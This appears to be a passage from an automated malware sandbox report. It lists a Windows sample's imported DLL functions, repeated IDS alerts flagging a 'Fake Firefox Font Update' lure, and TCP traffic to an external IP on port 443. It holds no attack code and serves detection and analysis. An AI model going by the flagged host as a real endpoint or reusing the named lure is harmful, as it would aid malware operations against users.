kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CoUninitialize, CoInitialize
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-26T08:11:09.360851+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49708	50.7.187.218	443	TCP
2024-11-26T08:11:11.638736+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49711	50.7.187.218	443	TCP
2024-11-26T08:11:13.914572+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49713	50.7.187.218	443	TCP
2024-11-26T08:11:16.082568+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49715	50.7.187.218	443	TCP
2024-11-26T08:11:18.223134+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49718	50.7.187.218	443	TCP
2024-11-26T08:11:20.675162+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49725	50.7.187.218	443	TCP
2024-11-26T08:11:22.868570+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49733	50.7.187.218	443	TCP
2024-11-26T08:11:25.014735+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49742	50.7.187.218	443	TCP
2024-11-26T08:11:27.172305+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49749	50.7.187.218	443	TCP
2024-11-26T08:11:29.389804+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49756	50.7.187.218	443	TCP
2024-11-26T08:11:31.526426+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49763	50.7.187.218	443	TCP
2024-11-26T08:11:33.621699+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49770	50.7.187.218	443	TCP
2024-11-26T08:11:35.800978+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49778	50.7.187.218	443	TCP
2024-11-26T08:11:38.069883+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49785	50.7.187.218	443	TCP
2024-11-26T08:11:40.254348+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49792	50.7.187.218	443	TCP
2024-11-26T08:11:42.434121+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49799	50.7.187.218	443	TCP
2024-11-26T08:11:44.605823+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49806	50.7.187.218	443	TCP
2024-11-26T08:11:46.781097+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49812	50.7.187.218	443	TCP
2024-11-26T08:11:48.955453+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49819	50.7.187.218	443	TCP
2024-11-26T08:11:51.142931+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49826	50.7.187.218	443	TCP
2024-11-26T08:11:53.230697+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49833	50.7.187.218	443	TCP
2024-11-26T08:11:55.382503+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49839	50.7.187.218	443	TCP
2024-11-26T08:11:57.469838+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49845	50.7.187.218	443	TCP
2024-11-26T08:11:59.684835+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49852	50.7.187.218	443	TCP
2024-11-26T08:12:01.895489+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49859	50.7.187.218	443	TCP
2024-11-26T08:12:03.977085+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49867	50.7.187.218	443	TCP
2024-11-26T08:12:06.305080+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49874	50.7.187.218	443	TCP
2024-11-26T08:12:08.798340+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49880	50.7.187.218	443	TCP
2024-11-26T08:12:10.965822+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49887	50.7.187.218	443	TCP
2024-11-26T08:12:13.341006+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49894	50.7.187.218	443	TCP
2024-11-26T08:12:15.494269+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49901	50.7.187.218	443	TCP
2024-11-26T08:12:17.724462+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49908	50.7.187.218	443	TCP
2024-11-26T08:12:19.929032+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49915	50.7.187.218	443	TCP
2024-11-26T08:12:22.115166+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49922	50.7.187.218	443	TCP
2024-11-26T08:12:24.245099+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49929	50.7.187.218	443	TCP
2024-11-26T08:12:26.450205+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49936	50.7.187.218	443	TCP
2024-11-26T08:12:28.625681+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49943	50.7.187.218	443	TCP
2024-11-26T08:12:30.796189+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49950	50.7.187.218	443	TCP
2024-11-26T08:12:32.969436+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49957	50.7.187.218	443	TCP
2024-11-26T08:12:35.120345+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49964	50.7.187.218	443	TCP
2024-11-26T08:12:37.475728+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49971	50.7.187.218	443	TCP
2024-11-26T08:12:39.583563+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49979	50.7.187.218	443	TCP
2024-11-26T08:12:41.748298+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49986	50.7.187.218	443	TCP
2024-11-26T08:12:43.888557+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49993	50.7.187.218	443	TCP
2024-11-26T08:12:46.022721+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50000	50.7.187.218	443	TCP
2024-11-26T08:12:48.152774+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50007	50.7.187.218	443	TCP
2024-11-26T08:12:50.278727+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50014	50.7.187.218	443	TCP
2024-11-26T08:12:52.422056+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50020	50.7.187.218	443	TCP
2024-11-26T08:12:54.490537+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50027	50.7.187.218	443	TCP
2024-11-26T08:12:56.649069+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50033	50.7.187.218	443	TCP
2024-11-26T08:12:58.769830+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50040	50.7.187.218	443	TCP
2024-11-26T08:13:00.903306+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50047	50.7.187.218	443	TCP
2024-11-26T08:13:03.301313+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50054	50.7.187.218	443	TCP
2024-11-26T08:13:05.421743+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50061	50.7.187.218	443	TCP
2024-11-26T08:13:07.488315+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50065	50.7.187.218	443	TCP
2024-11-26T08:13:09.615877+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50072	50.7.187.218	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 08:11:07.865792990 CET	49707	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:07.865864038 CET	443	49707	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:07.865967035 CET	49707	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:07.866214991 CET	49707	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:07.866293907 CET	443	49707	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:07.866391897 CET	49707	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:07.956790924 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:07.956842899 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:07.956923008 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:07.983814955 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:07.983850956 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:09.360724926 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:09.360851049 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:09.364759922 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:09.364777088 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:09.365206957 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:09.415882111 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:09.455642939 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:09.503330946 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:09.861273050 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:09.861350060 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:09.861438990 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:09.904341936 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:09.904365063 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:09.904383898 CET	49708	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:09.904392004 CET	443	49708	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:10.156047106 CET	49710	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:10.156074047 CET	443	49710	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:10.156213045 CET	49710	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:10.166474104 CET	49710	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:10.166526079 CET	443	49710	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:10.166591883 CET	49710	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:10.227149963 CET	49711	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:10.227200985 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:10.227279902 CET	49711	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:10.227684021 CET	49711	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:10.227698088 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:11.638648033 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:11.638736010 CET	49711	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:11.640172958 CET	49711	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:11.640182972 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:11.640424013 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:11.641854048 CET	49711	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:11.683332920 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:12.157558918 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:12.157643080 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:12.157706022 CET	49711	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.158030033 CET	49711	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.158030033 CET	49711	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.158056974 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:12.158070087 CET	443	49711	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:12.390028000 CET	49712	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.390068054 CET	443	49712	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:12.390192986 CET	49712	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.390394926 CET	49712	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.390439034 CET	443	49712	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:12.390546083 CET	49712	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.502659082 CET	49713	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.502720118 CET	443	49713	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:12.502798080 CET	49713	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.503673077 CET	49713	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:12.503690958 CET	443	49713	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:13.914422035 CET	443	49713	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:13.914572001 CET	49713	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:13.916228056 CET	49713	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:13.916239023 CET	443	49713	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:13.916563988 CET	443	49713	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:13.918370962 CET	49713	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:13.959336996 CET	443	49713	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:14.433383942 CET	443	49713	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:14.433470964 CET	443	49713	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:14.433536053 CET	49713	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:14.433854103 CET	49713	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:14.433867931 CET	443	49713	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:14.659316063 CET	49714	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:14.659369946 CET	443	49714	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:14.659468889 CET	49714	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:14.659550905 CET	49714	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:14.659626007 CET	443	49714	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:14.659689903 CET	49714	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:14.669014931 CET	49715	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:14.669044971 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:14.669131041 CET	49715	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:14.669419050 CET	49715	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:14.669431925 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.082468033 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.082567930 CET	49715	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.084949970 CET	49715	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.084963083 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.085290909 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.086834908 CET	49715	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.131339073 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.601118088 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.601214886 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.601325035 CET	49715	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.601632118 CET	49715	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.601653099 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.601670027 CET	49715	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.601677895 CET	443	49715	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.825866938 CET	49717	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.825923920 CET	443	49717	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.826051950 CET	49717	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.826448917 CET	49717	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.826508045 CET	443	49717	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.826580048 CET	49717	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.848104954 CET	49718	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.848191977 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:16.848299980 CET	49718	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.848728895 CET	49718	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:16.848746061 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.223051071 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.223134041 CET	49718	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:18.224688053 CET	49718	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:18.224694967 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.225043058 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.226680040 CET	49718	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:18.271342993 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.732131004 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.732348919 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.732424021 CET	49718	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:18.755297899 CET	49718	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:18.755343914 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.755363941 CET	49718	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:18.755382061 CET	443	49718	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.948504925 CET	49724	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:18.948548079 CET	443	49724	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:18.948632956 CET	49724	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:19.202749968 CET	49724	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:19.202950001 CET	443	49724	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:19.203011036 CET	49724	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:19.250534058 CET	49725	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:19.250580072 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:19.250655890 CET	49725	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:19.251152992 CET	49725	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:19.251169920 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:20.675066948 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:20.675162077 CET	49725	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:20.676548004 CET	49725	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:20.676553965 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:20.677442074 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:20.682183027 CET	49725	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:20.723340034 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:21.190418005 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:21.190516949 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:21.190572023 CET	49725	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.190828085 CET	49725	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.190843105 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:21.190855026 CET	49725	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.190861940 CET	443	49725	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:21.386684895 CET	49732	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.386722088 CET	443	49732	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:21.386799097 CET	49732	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.398225069 CET	49732	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.398299932 CET	443	49732	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:21.398370981 CET	49732	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.409395933 CET	49733	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.409472942 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:21.409559965 CET	49733	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.410084009 CET	49733	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:21.410113096 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:22.868468046 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:22.868570089 CET	49733	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:22.869817019 CET	49733	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:22.869843006 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:22.870110035 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:22.871260881 CET	49733	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:22.911376953 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:23.396799088 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:23.397001982 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:23.397077084 CET	49733	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.397524118 CET	49733	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.397542000 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:23.397562981 CET	49733	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.397568941 CET	443	49733	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:23.591083050 CET	49741	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.591141939 CET	443	49741	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:23.591229916 CET	49741	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.591422081 CET	49741	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.591548920 CET	443	49741	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:23.591691971 CET	49741	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.600400925 CET	49742	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.600444078 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:23.601186037 CET	49742	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.601480961 CET	49742	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:23.601499081 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.014661074 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.014734983 CET	49742	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.016510963 CET	49742	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.016522884 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.016963005 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.018258095 CET	49742	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.059345961 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.537318945 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.537508011 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.537616014 CET	49742	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.538049936 CET	49742	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.538067102 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.538079023 CET	49742	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.538086891 CET	443	49742	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.746678114 CET	49748	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.746736050 CET	443	49748	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.746855974 CET	49748	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.747015953 CET	49748	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.747109890 CET	443	49748	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.747262955 CET	49748	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.757616043 CET	49749	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.757653952 CET	443	49749	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:25.757725954 CET	49749	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.758227110 CET	49749	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:25.758255959 CET	443	49749	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.172213078 CET	443	49749	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.172305107 CET	49749	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:27.182656050 CET	49749	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:27.182666063 CET	443	49749	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.183032990 CET	443	49749	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.188138962 CET	49749	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:27.235327005 CET	443	49749	50.7.187.218	192.168.2.6
